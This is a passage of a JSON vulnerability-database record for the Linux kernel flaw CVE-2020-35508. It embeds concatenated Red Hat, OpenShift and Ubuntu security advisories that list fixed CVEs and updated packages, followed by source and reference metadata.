      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process. Linux Kernel Contains an initialization vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security and bug fix update\nAdvisory ID:       RHSA-2021:1739-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:1739\nIssue date:        2021-05-18\nCVE Names:         CVE-2019-19523 CVE-2019-19528 CVE-2020-0431\n                   CVE-2020-11608 CVE-2020-12114 CVE-2020-12362\n                   CVE-2020-12464 CVE-2020-14314 CVE-2020-14356\n                   CVE-2020-15437 CVE-2020-24394 CVE-2020-25212\n                   CVE-2020-25284 CVE-2020-25285 CVE-2020-25643\n                   CVE-2020-25704 CVE-2020-27786 CVE-2020-27835\n                   CVE-2020-28974 CVE-2020-35508 CVE-2021-0342\n====================================================================\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time (v. 8) - x86_64\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)\n\n* kernel: use-after-free caused by a malicious USB device in the\ndrivers/usb/misc/adutux.c driver (CVE-2019-19523)\n\n* kernel: use-after-free bug caused by a malicious USB device in the\ndrivers/usb/misc/iowarrior.c driver (CVE-2019-19528)\n\n* kernel: possible out of bounds write in kbd_keycode of keyboard.c\n(CVE-2020-0431)\n\n* kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)\n\n* kernel: use-after-free in usb_sg_cancel function in\ndrivers/usb/core/message.c (CVE-2020-12464)\n\n* kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)\n\n* kernel: Use After Free vulnerability in cgroup BPF component\n(CVE-2020-14356)\n\n* kernel: NULL pointer dereference in serial8250_isa_init_ports function in\ndrivers/tty/serial/8250/8250_core.c (CVE-2020-15437)\n\n* kernel: umask not applied on filesystem without ACL support\n(CVE-2020-24394)\n\n* kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)\n\n* kernel: incomplete permission checking for access to rbd devices\n(CVE-2020-25284)\n\n* kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n(CVE-2020-25285)\n\n* kernel: improper input validation in ppp_cp_parse_cr function leads to\nmemory corruption and read overflow (CVE-2020-25643)\n\n* kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)\n\n* kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)\n\n* kernel: child process is able to access parent mm through hfi dev file\nhandle (CVE-2020-27835)\n\n* kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)\n\n* kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting\n- -\u003ereal_parent (CVE-2020-35508)\n\n* kernel: use after free in tun_get_user of tun.c could lead to local\nescalation of privilege (CVE-2021-0342)\n\n* kernel: NULL pointer dereferences in ov511_mode_init_regs and\nov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver\n1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver\n1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c\n1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c\n1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter\n1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem\n1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component\n1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support\n1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code\n1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow\n1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices\n1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0]\n1894793 - After configure hugepage and reboot test server, kernel got panic status. \n1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory\n1896842 - host locks up when running stress-ng itimers on RT kernel. \n1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds. \n1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem\n1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c\n1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle\n1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting -\u003ereal_parent\n1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon\n1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege\n1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c\n1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7\nNEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl\nWEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7\nt6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq\n0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk\ntW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5\nBssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen\nm7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr\nRxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe\nZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV\nlwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J\niJzkORGWplM\\xfb/D\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1328 - Port fix to 5.0.z for BZ-1945168\n\n6. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source\ntree (BZ#1968022)\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1886285 - CVE-2020-26541 kernel: security bypass in certs/blacklist.c and certs/system_keyring.c\n1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory\n1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting -\u003ereal_parent\n1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan\n1968022 - kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source tree\n1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer\n\n6. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.13. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2122\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nThis update fixes the following bug among others:\n\n* Previously, resources for the ClusterOperator were being created early in\nthe update process, which led to update failures when the ClusterOperator\nhad no status condition while Operators were updating. This bug fix changes\nthe timing of when these resources are created. As a result, updates can\ntake place without errors. (BZ#1959238)\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-x86_64\n\nThe image digest is\nsha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-s390x\n\nThe image digest is\nsha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le\n\nThe image digest is\nsha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1923268 - [Assisted-4.7] [Staging] Using two both spelling \"canceled\"  \"cancelled\"\n1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list\n1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits\n1959238 - CVO creating cloud-controller-manager too early causing upgrade failures\n1960103 - SR-IOV obliviously reboot the node\n1961941 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1962302 - packageserver clusteroperator does not set reason or message for Available condition\n1962312 - Deployment considered unhealthy despite being available and at latest generation\n1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1963115 - Test verify /run filesystem contents failing\n\n5. ==========================================================================\nUbuntu Security Notice USN-4752-1\nFebruary 25, 2021\n\nlinux-oem-5.6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.6: Linux kernel for OEM systems\n\nDetails:\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered\nthat legacy pairing and secure-connections pairing authentication in the\nBluetooth protocol could allow an unauthenticated user to complete\nauthentication without pairing credentials via adjacent access. A\nphysically proximate attacker could use this to impersonate a previously\npaired Bluetooth device. (CVE-2020-10135)\n\nJay Shin discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle directory access with broken indexing,\nleading to an out-of-bounds read vulnerability. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2020-14314)\n\nIt was discovered that the block layer implementation in the Linux kernel\ndid not properly perform reference counting in some situations, leading to\na use-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash). (CVE-2020-15436)\n\nIt was discovered that the serial port driver in the Linux kernel did not\nproperly initialize a pointer in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2020-15437)\n\nAndy Nguyen discovered that the Bluetooth HCI event packet parser in the\nLinux kernel did not properly handle event advertisements of certain sizes,\nleading to a heap-based buffer overflow. A physically proximate remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-24490)\n\nIt was discovered that the NFS client implementation in the Linux kernel\ndid not properly perform bounds checking before copying security labels in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-25212)\n\nIt was discovered that the Rados block device (rbd) driver in the Linux\nkernel did not properly perform privilege checks for access to rbd devices\nin some situations. A local attacker could use this to map or unmap rbd\nblock devices. (CVE-2020-25284)\n\nIt was discovered that the block layer subsystem in the Linux kernel did\nnot properly handle zero-length requests. A local attacker could use this\nto cause a denial of service. (CVE-2020-25641)\n\nIt was discovered that the HDLC PPP implementation in the Linux kernel did\nnot properly validate input in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2020-25643)\n\nKiyin (\u5c39\u4eae) discovered that the perf subsystem in the Linux kernel did\nnot properly deallocate memory in some situations. A privileged attacker\ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2020-25704)\n\nIt was discovered that the KVM hypervisor in the Linux kernel did not\nproperly handle interrupts in certain situations. A local attacker in a\nguest VM could possibly use this to cause a denial of service (host system\ncrash). (CVE-2020-27152)\n\nIt was discovered that the jfs file system implementation in the Linux\nkernel contained an out-of-bounds read vulnerability. A local attacker\ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nIt was discovered that an information leak existed in the syscall\nimplementation in the Linux kernel on 32 bit systems. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nIt was discovered that the framebuffer implementation in the Linux kernel\ndid not properly perform range checks in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker could use\nthis to gain unintended write access to read-only memory pages. A local attacker could use this to cause a\ndenial of service (system crash) or possibly expose sensitive information. \n(CVE-2020-29369)\n\nJann Horn discovered that the romfs file system in the Linux kernel did not\nproperly validate file system meta-data, leading to an out-of-bounds read. \nAn attacker could use this to construct a malicious romfs image that, when\nmounted, exposed sensitive information (kernel memory). (CVE-2020-29371)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use\nconsistent locking in some situations, leading to a read-after-free\nvulnerability. A local attacker could use this to cause a denial of service\n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux\nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after-\nfree vulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. \n(CVE-2020-35508)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.6.0-1048-oem      5.6.0-1048.52\n  linux-image-oem-20.04           5.6.0.1048.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4752-1\n  CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437,\n  CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641,\n  CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815,\n  CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369,\n  CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-35508",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "162626",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161556",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163584",
        "trust": 0.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072252",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021122404",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0717",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1820",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1866",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1732",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2439",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1688",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161555",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162654",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-377704",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162877",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "id": "VAR-202103-0287",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:38:27.231000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux\u00a0Kernel\u00a0Archives Red hat Red\u00a0Hat\u00a0Bugzilla",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabilities in the Linux Kernel, Samba, Sudo, Python, and tcmu-runner affect IBM Spectrum Protect Plus",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddbe78143bb073890c2ecb87b35850bf"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-665",
        "trust": 1.1
      },
      {
        "problemtype": "Improper initialization (CWE-665) [ Other ]",
        "trust": 0.8
      },
      {
        "problemtype": "CWE-362",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35508"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902724"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210513-0006/"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35508"
      },
      {
        "trust": 0.7,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-the-linux-kernel-samba-sudo-python-and-tcmu-runner-affect-ibm-spectrum-protect-plus/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2021:1739"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2021:1578"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2021:2719"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2021:2718"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072252"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-signal-sending-34683"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1866"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1688"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1732"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1820"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2439"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162626/red-hat-security-advisory-2021-1578-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163584/red-hat-security-advisory-2021-2719-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021122404"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
      },
      {
        "trust": 0.5,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2020-25704"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-12114"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-19528"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-12464"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-14314"
      },
      {
